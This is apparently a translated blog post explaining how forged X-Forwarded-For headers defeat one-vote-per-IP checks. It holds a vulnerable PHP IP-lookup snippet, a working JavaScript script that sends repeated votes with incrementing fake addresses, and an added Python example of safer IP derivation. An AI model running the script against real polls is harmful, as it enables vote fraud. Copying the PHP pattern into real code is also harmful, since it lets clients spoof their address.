Forging the HTTP X-Forwarded-For Header to Cast Repeat Votes: An Analysis

/*
* Author's blog: http://87year.info
* Article URL: http://87year.info/2011/03/09/pseudo-build httpheader x-forwarded-forincoming Ticket/
* Note: this is a basic write-up; readers for whom it is old news can skip it.
*/
Background:
A friend was casting votes on a website, and after voting once he found that each IP address was allowed only a single vote. Voting again was too much trouble, so he gave up.
The next day another friend said the site could be voted on repeatedly by forging the X-Forwarded-For field in the HTTP header.
I looked up how X-Forwarded-For works on Baidu; the header has been around for a long time.
X-Forwarded-For (the XFF header) is meant to carry the real IP address of the client, i.e. the originating end of the HTTP request. Normally it is only added when the request passes through an HTTP proxy or load balancer.
It is not a standard request header defined in any RFC; it originated with the Squid caching proxy, and its development documentation describes the header.
The standard format is as follows:
X-Forwarded-For: client1, proxy1, proxy2
As the format shows, the header can carry several addresses separated by commas (,). The first entry is the real client IP; the remaining entries are the proxies or load balancers the request has passed through, each appending the address it received the request from, so a request that crosses N proxies ends up with N further addresses after the client.
Wikipedia's explanation of X-Forwarded-For: http://en.wikipedia.org/wiki/X-Forwarded-For
Analysis:
Since the whole point is that the client IP address can be forged, let's first look at how a website obtains the client IP (taking PHP as the example). The following code was found via Baidu and is probably in use on a large number of websites.

<?php
// Vulnerable pattern: if a proxy header is present, believe X-Forwarded-For as the client address
$user_IP = isset($_SERVER["HTTP_VIA"])                       // was the request relayed through a proxy?
    ? (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : "")  // yes: take the address from XFF
    : $_SERVER["REMOTE_ADDR"];                               // no: use the TCP peer address
// If that yielded nothing, fall back to REMOTE_ADDR.
$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];
?>
First the code checks whether the HTTP_VIA header exists; HTTP_VIA indicates that a proxy server was used. If it is absent, the client IP is taken from REMOTE_ADDR; if it is present, the client IP is taken from X-Forwarded-For.
I suspect many programmers copy this code straight from Baidu; the ASP version is similar.
Now let's test it.
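As an added example that is not part of the original post, the following Python contrasts the naive pattern above with a derivation that believes X-Forwarded-For only for hops appended by the site's own proxies. The dict passed in is shaped like PHP's $_SERVER, and the trusted proxy range 10.0.0.0/8 is an assumption constructed for the example.

```python
import ipaddress

# Constructed for this example: the address range of the site's own reverse
# proxy / load balancer. Only XFF entries appended by these hosts are believed.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def is_trusted_proxy(addr):
    """True if addr is one of our own proxies (malformed input counts as untrusted)."""
    try:
        return any(ipaddress.ip_address(addr) in net for net in TRUSTED_PROXIES)
    except ValueError:
        return False


def naive_client_ip(server):
    """The pattern from the post: if X-Forwarded-For is present, believe it.
    `server` is a dict shaped like PHP's $_SERVER."""
    xff = server.get("HTTP_X_FORWARDED_FOR", "")
    return xff.split(",")[0].strip() if xff.strip() else server["REMOTE_ADDR"]


def client_ip(server):
    """Derive the client address without trusting anything the client can write.

    REMOTE_ADDR is the TCP peer and cannot be forged by an HTTP header. If that
    peer is not one of our proxies, the request came straight from the client and
    XFF is ignored. Otherwise walk XFF from the right (each proxy appends the
    address it received the request from) and stop at the first hop that is not
    one of our proxies: that is the nearest address we can vouch for.
    """
    remote = server["REMOTE_ADDR"]
    if not is_trusted_proxy(remote):
        return remote
    hops = [h.strip() for h in server.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if is_trusted_proxy(hop):
            continue
        try:
            ipaddress.ip_address(hop)  # reject garbage such as "foo" or "1.2.3"
            return hop
        except ValueError:
            break
    return remote  # no usable hop: fall back to the proxy's own address
```

With a direct connection carrying a forged header, naive_client_ip returns the forged value while client_ip returns the TCP peer, so a one-vote-per-IP check based on client_ip is unaffected by the header.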
Server code:

<?php
// Output HTTP_X_FORWARDED_FOR (absent when the request carried no such header)
echo "HTTP_X_FORWARDED_FOR: " . (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : "(none)");
// Output REMOTE_ADDR, the address of the TCP peer
echo "REMOTE_ADDR: " . $_SERVER["REMOTE_ADDR"];
?>

The two values differ: HTTP_X_FORWARDED_FOR echoes whatever the client put in the header, while REMOTE_ADDR is the real IP address of the connecting peer.
Therefore, if a website uses X-Forwarded-For to determine the client's IP address, this logic flaw lets a single client cast repeat votes.
Demo address: http://87year.info/t00ls/vote/index.html (right-click to view the full client source)

Client code:
<script>
function CreateXMLHttp() {
    var xmlhttp = false; // stays false if no XMLHttpRequest object could be created
    try {
        xmlhttp = new XMLHttpRequest(); // every browser except old IE supports this
    } catch (e) {
        try {
            xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); // newer IE versions
        } catch (e) {
            try {
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); // older IE versions
            } catch (failed) {
                xmlhttp = false; // keep it false if everything fails
            }
        }
    }
    return xmlhttp;
}
var g_i = 0; // request counter, also appended to the forged address
function $(obj) {
    return document.getElementById(obj);
}
function onSearch() {
    var g_xmlhttp = CreateXMLHttp();
    if (g_xmlhttp == false) {
        alert("your browser does not support ajax");
        return;
    }
    var sendData = "bid=" + $("id").value;
    var fakeIP = $("ip").value + g_i; // e.g. 200.156.4.0, 200.156.4.1, ...
    // alert(fakeIP); return;
    g_xmlhttp.open("POST", "http://192.168.15.166/ip.php", true);
    g_xmlhttp.setRequestHeader("Content-Length", sendData.length); // browsers compute this themselves and ignore the call
    g_xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    g_xmlhttp.setRequestHeader("X-Forwarded-For", fakeIP);
    g_xmlhttp.onreadystatechange = function () {
        if (/* g_xmlhttp.status == 200 */ g_xmlhttp.readyState == 4) {
            $("res").innerHTML += g_xmlhttp.responseText + "<br/>";
            if (++g_i < 5) {
                setTimeout(onSearch, 1000); // send the next request one second later
            }
        }
    };
    g_xmlhttp.send(sendData);
}
</script>
<form name="form1" method="post" action="" id="form1">
<div>
<br/>
IP address: <input id="ip" type="text" value="200.156.4."/><br/>
Voting ID: <input id="id" type="text" value="232"/><br/>
<input id="search" type="button" value="start" onclick="onSearch()"/>
<br/>
<br/>
<span id="res"></span>
<br/>
<br/>
</div>
</form>
 
Reference 1: http://www.sablog.net/blog/x-forwarded-for/
Reference 2: http://en.wikipedia.org/wiki/X-Forwarded-For
Reference 3: http://www.baidu.com